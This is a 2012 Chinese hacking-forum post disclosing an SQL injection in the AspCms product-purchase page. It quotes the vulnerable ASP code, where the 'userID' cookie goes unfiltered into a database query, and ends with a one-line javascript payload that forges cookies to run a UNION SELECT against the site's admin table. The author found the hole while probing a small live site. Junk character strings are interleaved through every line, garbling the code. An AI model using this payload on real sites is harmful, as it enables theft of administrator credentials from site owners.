好久没上土司了,上来一看发现在删号名单内.....: A' C2 p0 b/ t: z4 }, Z
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
( O' s" K; p I5 N3 @* i7 I1 R$ Z" A废话不多说,看代码:
! y# l7 L7 q, u8 z7 ~. n: j4 t- u
7 S3 Y* u$ O0 X/ `6 `2 P% a; o! c<%6 E5 g% \) W( a+ H* O
9 v2 H4 U0 |+ Y/ y0 A* q$ wif action = "buy" then
3 _: Z3 ?& q' o6 p, X: v
; Q9 J# g6 M+ ?. E7 { H1 H2 o6 e: p addOrder()8 O2 C1 T9 w: s& j7 m+ ^
4 y) @# C- K+ Eelse
9 q/ z" k! b! X1 {, y( T6 C
' H* ]# |6 n" z& N" ` x; I echoContent()
* T* F8 d; M& `! | ]5 N. ?6 H+ l. \
5 f: R) B! A0 K& ]3 A* qend if
* E7 U) }& h- x0 ?$ I& K% C' D* ~ Z; Z! \3 J. ?1 t
, m% Y+ C1 e' O
$ e3 f/ Q& [( V* J……略过
) ?) o$ n) n' o3 ?; Q
% _6 y" x9 L( G! r
& q6 u P9 z3 v" L2 {
# T- D9 D! ]/ L3 K/ ASub echoContent()
) h( m+ \4 _/ R- p& q1 M' W1 E: V3 y( i. H
dim id. v& ~% B: u/ K6 |$ @, {7 c
5 e( p2 E" i1 ]( g( Z; u
id=getForm("id","get"); L7 Z8 m5 P1 y+ {* t7 _1 W/ l' q
. Y7 M; {& ]' ~9 v
( M! H- Q4 o: S9 g
: R- }! ~2 ]) o x& I) | if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
9 z6 a. j' f+ T% G8 c# L o. A7 b$ S5 ?& [: H
" P4 j1 R% b$ r# \$ ]4 J/ R
5 W' V2 u4 P. Y# v" s& Y dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")$ E6 A' B: d# Q+ Q% k: P! e) J* X
% ?- p6 j5 d1 ^# @8 q+ f dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct; m: p% V/ ~1 j! z3 O& e# w' O
9 a/ S2 C. u- u, r4 C
Dim templatePath,tempStr1 s+ J' [# m6 G9 O. z0 o: j
4 W/ ~, t6 C, C
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
) e% R5 @ i) u8 E. q6 \" \ y7 S4 j! s- K
% O% A4 ]1 x' o- Y1 k) h
/ f5 ]6 E5 B4 k& y2 Y. R# k$ o2 k set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
# d: h1 e. b, x/ l$ ]5 b7 k) C* F3 y/ `' q% h5 i
selectproduct=rsObj(0)
9 b2 y7 z1 b6 H' W2 Z0 _; N% x7 Q- i# ~0 x% q$ m
4 _6 E# q: e9 @7 N! s# s
6 U; c6 N2 }' x+ S- j Dim linkman,gender,phone,mobile,email,qq,address,postcode1 K) B. F4 `; h' e$ g
# o0 f7 j: Z4 w( | e if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0% t7 `" n/ M# @
( K4 v1 M" o5 Y, [7 G' C/ R: `/ ^
if rCookie("loginstatus")=1 then , m, C0 o' u" u( E4 w- n& J1 B
, ^6 L4 _% F" |3 ]; f) l) |" \$ B set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")6 g% B: ?. S6 D' g; U
; k, V5 c7 E- B+ x1 j7 w
linkman=rsObj("truename")
% q2 P( D. }( |- c0 Z- R. ^1 X1 b
! l' L) W- A6 W6 Q1 l, b/ Z: B gender=rsObj("gender")
: L- ^' Z3 F4 p+ a: Q0 _
" a/ c+ b* u! x, x phone=rsObj("phone")6 x/ |! R- f$ [- l3 P2 V
' q2 X# N& M" S mobile=rsObj("mobile")
7 ], Y6 P* F1 h+ m* h
: z- g* v1 p8 C$ K0 E3 S$ L email=rsObj("email")4 B* J# {8 A! t7 O
" Q% W4 _$ o! U& j
qq=rsObj("qq")
5 K7 \6 _8 z5 J5 @0 v1 A3 H: J" M9 l+ N3 y* j* w
address=rsObj("address")% z h9 Y9 H7 C& {9 a j
) T! ~8 x o1 l% k8 K9 X( ~( l postcode=rsObj("postcode")( h6 R9 v' X7 g/ g6 c2 C+ e
/ K$ F# N0 ]+ c0 r7 I: \; ]6 k8 A else 5 M7 G8 f5 X2 ~6 l$ D
! Z6 H& B5 B9 C5 {4 ?
gender=1
% ~3 S/ ~% R0 m( t8 n5 j% P; h
end if
: c8 n4 D+ }# O, L! w- T2 f# G1 o( {' f* q% \8 t [
rsObj.close()
( k# }3 q' U! b, ~! F7 T9 Y+ }% l" ]6 x, X; T- j3 G6 T' k
I5 U5 I; Y( i0 i; T* w) U1 }* H5 X- ~9 k, [9 ~
with templateObj ; S2 o0 j0 @! n9 f( ]
" Q/ i3 z/ L+ n9 G; m8 y" R& h, y
.content=loadFile(templatePath)
( ~* |, D8 ~6 R+ p0 b D
; ~8 T' P' D W .parseHtml()
* V" r1 K- ^$ C" ~0 O' y
4 \- S7 D0 H0 Z5 @. L6 b, K" Q7 | .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)0 I9 l* j) J& B; u/ }7 U# z
1 M, _5 H% K3 a9 v. Q; @
.content=replaceStr(.content,"[aspcms:linkman]",linkman) , a% }5 k. Z4 {; T- o$ H
! r' f( d3 C, g
.content=replaceStr(.content,"[aspcms:gender]",gender)
1 \! \0 l2 U2 x2 }% w n1 [; }9 m( `" f0 B# u
.content=replaceStr(.content,"[aspcms:phone]",phone)
j( h8 k# L3 M
1 q, Z. n. G7 Y% t8 ] .content=replaceStr(.content,"[aspcms:mobile]",mobile) 9 M& l2 i* a' k& N, }
$ z& s# k. j0 e5 v .content=replaceStr(.content,"[aspcms:email]",email)
) |& k* O4 t: f* w- c# `1 o8 W" c! g7 @ N3 H5 ^5 ]5 _
.content=replaceStr(.content,"[aspcms:qq]",qq)
6 k" v/ |: V/ P; k _
' R" u; s0 `2 @) j+ v! H! }8 x( K .content=replaceStr(.content,"[aspcms:address]",address)
5 R& A0 Y, E$ B2 z: i& c
, i: c8 O* O# l3 W9 i .content=replaceStr(.content,"[aspcms:postcode]",postcode)
/ K+ Z' A; o4 Z; ?6 ^& F
9 r$ T' {6 t% Y: } .parseCommon()
% O3 N& ~/ Y% i4 w8 l7 U6 v/ F
- _6 O p, P( K echo .content " b0 I! K! \8 T. {1 ^8 E! s
( Q3 X: T: x6 f( t
end with6 v! T5 W/ z5 y
9 A0 J5 l! F8 M( A
set templateobj =nothing : terminateAllObjects$ m5 f0 |, B H" ^- `2 w3 a
: u* x2 T3 Q: x' L$ |6 F& u2 j
End Sub8 ~6 Z& A1 E: Q1 x
漏洞很明显,没啥好说的
' D/ H: O! O- y. P% w6 }! D) j! Bpoc:! m! F! F# h! O- i; a0 d$ K7 m
$ M5 N# F- k* P0 ~, o0 M
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子7 T6 D7 y1 D* u7 T0 e0 j
. Y0 D' g$ {& M7 F; q |
发表于 2012-12-27 08:35:05
收藏
支持
反对